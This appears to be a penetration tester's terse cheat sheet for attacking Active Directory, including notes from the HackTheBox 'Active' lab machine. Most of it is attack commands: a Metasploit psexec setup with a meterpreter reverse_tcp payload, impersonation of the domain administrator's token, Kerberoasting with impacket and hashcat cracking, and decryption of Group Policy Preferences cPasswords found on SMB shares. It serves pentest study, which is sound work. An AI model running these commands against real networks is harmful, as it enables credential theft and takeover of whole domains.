Active Directory
// AD
python
conn=socket.create_connection(('10.129.238.232',23))
curl -v telnet://10.129.238.232:23
use exploit/windows/smb/psexec
set target 2
set payload windows/x64/meterpreter/reverse_tcp
options
set LOST eth0
load double tab
list_tokens -u
impersonate domain\\administrator
rev2self
Kerberoasting
/opt/impacket/examples
python GetUserSPNs.py domain.local/username:password -dc-ip 192.168.1.1 -request
python GetUserSPNs.py <DOMAIN/username:password> -dc-ip <ip of DC> -request
copy hash
hashcat --help | grep Kerberos
hashcat64.exe -m 13100 hash4.txt rockyou.txt -O
GPP (group policy preferences) attack:
Group Policy preferences allowed admins to create policies using embedded credential
These credentials were encrypted and placed in a "cPassword"
the key was accidentally released (whoops) and subsequently patched in MS14-025, but doesn't prevent previous uses
any foothold on any domain system will result in a leak of all credentials stored in group policy preferences.
https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
use smb_enum_gpp
run
HTB - "Active" machine
smbclient -L \\\\10.10.10.100\\
smbclient -L \\\\10.10.10.100\\Replication
recursive off
mget *
gpp-decrypt hash
Last updated
Was this helpful?